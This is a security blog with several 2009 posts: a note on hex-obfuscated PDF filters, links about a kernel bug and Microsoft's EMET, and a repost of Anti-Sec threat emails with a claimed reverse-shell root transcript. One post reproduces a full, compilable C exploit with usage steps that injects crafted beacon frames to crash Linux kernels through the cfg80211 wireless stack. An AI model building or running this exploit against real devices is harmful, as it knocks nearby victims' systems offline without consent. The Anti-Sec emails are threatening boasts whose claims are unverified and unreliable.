Xanda's Blog !~!

PDF Obfuscation : Using Hexadecimal in Defining Filter

Nov
29

I was reading my RSS feed and suddenly I’ve found this PDF sample. We’ve found PDF-JS Obfuscation with this.info.title last week and this time comes another trick. Using hexadecimal in defining filter..

The following line was found in one of the stream

</Length 0000000/Filter/#41#53#43#49#49#38#35#44#65#63#6f#64#65>>

once converted from hex to ascii, here is what i’ve found

</Length 0000000/Filter/ASCII85Decode>>

Yeah.. nothing much, but yes the sample will be passed to Azizan for enhancement of Analyz3r

Happy Kernel Code Execution Via Internet Explorer

Nov
11

Happy Kernel Code Execution Via Internet Explorer 😛

Read more:

Prevention/Solution..

Update ur Windows.. How? Errr… Here

Microsoft Announcing the Release of the Enhanced Mitigation Evaluation Toolkit (EMET)

Oct
28

Even as you read this, people around the world are hunting for vulnerabilities in software applications.  Odds are some of them will be successful.  Depending on their motives and what they find, your software and systems may be put at risk.  So how do you protect your software from unknown vulnerabilities that may or may not exist?  One option is to use security mitigations.

Microsoft offers a number of different mitigation technologies that are designed to make it more difficult for an attacker to exploit vulnerabilities in a given piece of software.  Take a look at Michael Howard’s article “Protecting Your Code with Visual C++ Defenses” (http://msdn.microsoft.com/en-us/magazine/cc337897.aspx) for a brief overview of some of these technologies.

Supported mitigations include:

  • SEHOP
  • Dynamic DEP
  • NULL page allocation
  • Heap spray allocation

[Read more: HERE]

Linux Kernel < 2.6.30.5 cfg80211 Remote DoS

Aug
18

In case you guys haven’t notice about this vulnerability

/*
 * cfg80211-remote-dos.c
 *
 * Linux Kernel < 2.6.30.5 cfg80211 Remote DoS
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * 
 * Information:
 *
 *   http://patchwork.kernel.org/patch/41218/
 *
 *   These pointers can be NULL, the is_mesh() case isn't ever hit in the 
 *   current kernel, but cmp_ies() can be hit under certain conditions.
 *
 * Usage:
 *
 *   $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon
 *   $ airmon-ng start wlan0
 *   ...
 *   $ ./cfg80211-remote-dos mon0 mac80211
 *   [+] Initializing interface mon0...
 *   [+] Injecting crafted DoS beacon frames...
 *
 * Notes:
 *
 *   The NULL pointer dereference is triggered if the victim scans and receives
 *   a beacon frame that does not contain a SSID IE and then receives another 
 *   one that does have a SSID IE.  Raw frame injection via LORCON is required 
 *   on the wireless interface.  This should only affect the 2.6.30 series.
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
 
#include <tx80211.h>
#include <tx80211_packet.h>
 
#define BEACON_NOSSID \
	"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x30\x4b" \
	"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
	"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
	"\x03\x01\x07" \
	"\x05\x04\x00\x01\x01\x00" \
	"\x2a\x01\x04" \
	"\x32\x04\x30\x48\x60\x6c"
#define BEACON_NOSSID_LEN 64
 
#define BEACON_SSID \
	"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x00\x03\x52\x00\x00\x00" \
	"\x30\x4b" \
	"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
	"\x00\x03\x44\x6f\x53" \
	"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
	"\x03\x01\x07" \
	"\x05\x04\x00\x01\x01\x00" \
	"\x2a\x01\x04" \
	"\x32\x04\x30\x48\x60\x6c"
#define BEACON_SSID_LEN 69
 
void
usage(char **argv)
{
	int i;
	struct tx80211_cardlist *cardlist;
 
	printf("Usage: %s [interface] [drivername]\n", argv[0]);
 
	cardlist = tx80211_getcardlist();
 
	if (cardlist == NULL) {
		printf("Error accessing supported cardlist.\n");
	} else {
		printf("\nSupported drivers are: ");
		for (i = 1; i < cardlist->num_cards; i++) {
			printf("%s ", cardlist->cardnames[i]);
		}
		printf("\n");
	}
	tx80211_freecardlist(cardlist);
}
 
int
main(int argc, char **argv)
{
	struct tx80211 tx;
	struct tx80211_packet pkt;
	char p1[BEACON_NOSSID_LEN];
	char p2[BEACON_SSID_LEN];
	int ret, drivertype;
	uint8_t randbyte;
 
	if (argc < 3) {
		usage(argv);
		return 0;
	}
 
	printf("[+] Initializing interface %s...\n", argv[1]);
 
	drivertype = tx80211_resolvecard(argv[2]);
	if (drivertype == INJ_NODRIVER) {
		printf("[-] Driver name not recognized.\n");
		exit(1);
	}
 
	ret = tx80211_init(&tx, argv[1], drivertype);
	if (ret < 0) {
		printf("[-] Error initializing %s/%s", argv[1], argv[2]);
		exit(1);
	}
 
	ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON);
	if (ret != 0) {
		printf("[-] Error setting monitor mode.\n");
		printf("[-] %s.\n", tx80211_geterrstr(&tx));
		exit(1);
	}
 
	ret = tx80211_setchannel(&tx, 11);
	if (ret < 0) {
		printf("[-] Error setting channel.\n");
		printf("[-] %s.\n", tx80211_geterrstr(&tx));
		exit(1);
	}
 
	ret = tx80211_open(&tx);
	if (ret < 0) {
		printf("[-] Unable to open interface %s\n", tx.ifname);
		printf("[-] %s.\n", tx80211_geterrstr(&tx));
		exit(1);
	}
 
	srand(time(NULL));
 
	memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
	memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
 
	printf("[+] Injecting crafted DoS beacon frames...\n");
 
	while (1) {
		randbyte = rand() & 0xff;
		p1[15] = randbyte;
		p1[21] = randbyte;
		p2[15] = randbyte;
		p2[21] = randbyte;
 
		pkt.packet = p1;
		pkt.plen = BEACON_NOSSID_LEN;
		if (tx80211_txpacket(&tx, &pkt) < 0) {
			printf("[-] Unable to transmit packet.\n");
			printf("[-] %s.\n", tx80211_geterrstr(&tx));
			exit(1);
		}
 
		pkt.packet = p2;
		pkt.plen = BEACON_SSID_LEN;
		if (tx80211_txpacket(&tx, &pkt) < 0) {
			printf("[-] Unable to transmit packet.\n");
			printf("[-] %s.\n", tx80211_geterrstr(&tx));
			exit(1);
		}
	}
 
	tx80211_close(&tx);
 
	return 0;
}

Source: Milw0rm

After Astalavista and Imageshack, The Anti-Sec Group is Taking Down blackhat-forums.com. Will hackforums.net and Milw0rm.com be the next?

Jul
16

After Astalavista and Imageshack, the Anti-Sec Movement strikes again and this time the target is another one of the script kiddies favorite place, blackhat-forums.com.

Anti-Sec Movement in one of the email said that they are dedicated to eradicate full-disclosure of vulnerabilities, exploits and free discussion on hacking related topics. They also claimed that they are dedicated to stall the ocean of script-kiddies currently trawling the Internet, and those so called “White Hat Hackers”. Owh ya, talking about “..to stall the ocean of script-kiddies..” guest what was released in the Net hxxp://www.nopaste.com/p/aDTdT5s1C
Disclaimer:
1) WARNING! DO NOT COMPILE AND RUN THE EXPLOIT. IT IS FAKE
2) Me myself DON’T know who released this exploit and I’m NOT accusing Anti-Sec is involve in this

Hurm.. Ok.. Let’s move on. Here is the email sent by them after blackhat-forums.com was pawned.

From: Ant-Sec Movement
Date: Jul 16 2009, 10:20 am
Subject: [Full-disclosure] Anti-Sec - We have terminated blackhat-forums.com. Are you scared now Hackforums.net?
Blend in.
Get trusted.
Trust no one.
Own everyone.
Disclose nothing.
Destroy everything.
Take back the scene.
Never sell out, never surrender.
Get in as anonymous, Leave with no trace.
------------------------------
 
Dear Jesse Labrocca (Omniscient) and Hackforums.net,
 
The Anti-Sec movement has officially terminated Blackhat-forums.com using
yet ANOTHER 0-day exploit that we have discovered. This one takes advantage
of a previously undisclosed LiteSpeed vulnerability. This is primarily to
prove that we are serious and committed to our primary goal
- eradicating full-disclosure of computer vulnerabilities and exploits, and
terminating general discussion of hacking for any n00b and script-kiddie to
read and review - and learn from.
 
The Anti-Sec movement hopes Hackrforums.net now understands that our cyber
war against you is NOT a joke. We will be terminating Hackforums.net. You
are our number one target...we want to savor the moment and the suspense. We
will strike when you least expect it. This we promise.
 
Here is a brief transcript of the hacking of Blackhat-forums.com:
 
-----------------------------------------------------------------
 
anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com -p80
 
[+] Connecting to blackhat-forums.com:80
[+] Connected Successfully!
[+] Checking for Lightspeed vulnerability...
[+] Vulnerable!
[+] Sending exploit
[-] Phase 1
[-] Phase 2
[-] Phase 3
[+] Injecting Shellcode...
[+] Waiting for reverse shell...
 
[~] Connected to shell @ 74.86.203.65!
 
uid=0(root) gid=0 (root) groups=0 (root)
 
-----------------------------------------------------------
 
By terminating Blackhat-forums.com, we have furthered our goals in more ways
than one.
 
We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten
you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which
will cause a major blow to those who support full-disclosure of hacking
related information.
 
"Take out two birds with one stone."
 
Sincerely,
 
-anti-sec

Anti-Sec also claimed that they have the 0day for OpenSSH, LightSpeed and Apache.. and that are what they used (as they claimed) to bring imageshack and blackhat-forum down. Here is the portion of the email:

In addition to our OpenSSH 0-day exploit, the Anti-Sec movement have also
unearthed an Apache 0-day vulnerability and we have subsequently developed
exploit code in order to take advantage of this vulnerability. It affects
ALL versions. We will be using this as well as our OpenSSH exploit to hack
into Hackforums.net and rm its contents, thus terminating it.

There are many questions now brought by these incidents..
1) The 0day for OpenSSH, Apache, LightSpeed are FUD or real?
2) Are they really Anti-Sec or it was n3td3v (who is/are n3td3v)

What’s next? Maybe i’m not gonna (in another word: I’m too busy to) continue writing on this after this. BUT is you interested to follow this story, feel free to subscribe Full-disclosure 🙂

Disclaimer:
1) The source of these informations came from Full-disclosure. This is just a repost
Source: [1][2][3][4][5][6][7][8]

** Updated on 17/7/2009 **

Here is the clarification email by them

Dear Reader,
In light of recent events, we have decided to clarify exactly what the
Anti-Sec Movement is, and who we really are. Firstly, Anti-Sec is NOT an
individual clan or group; as the name implies, we are a movement - a protest
against White Hat Hackers and Full-Disclosure, if you will. Much like the
numerous protests against wars and other such major events that occur
similtaniosly around the world at times. With this foundation securely
explained and in place, we can move on.
 
Secondly, the sector of the Anti-Sec Movement who have made public threats
against Hackforums.net and Milw0rm.com are not in any way affiliated with
the Anti-Sec who have recently attacked public and innocent websites such as
Imageshack.
 
Thirdly, contrary to our previous statement, we do possess some major 0-day
exploits. Vulnerabilities we have developed exploit code for include
services such as Apache and LiteSpeed. Let us make it clear IMMEDIATELY that
we do not intend to use our newfound and previously undisclosed exploits
against ANY website or server that is not in some way hacking related. If
any such attacks occur against public websites NOT a part of the hacking
community, our hand is not part of it.
 
Fourthly, and most importantly, HackForums.net is still our number one
target and it WILL be compromised. It will be done in such a way, it will
almost appear non-existent. Furthermore, members of the Anti-Sec Movement in
OUR sector are currently mastering SQL Injection attacks using exclusive
materials.
 
Blend in.
Get trusted.
Trust no one.
Own everyone.
Disclose nothing.
Destroy everything.
Take back the scene.
Never sell out, never surrender.
Get in as anonymous, Leave with no trace.
 
You never know who is part of the Anti-Sec movement...betrayal strikes at
every turn...who can you trust?...are you already compromised?...melt into
the shadows...
 
Sincerely,
 
-anti-sec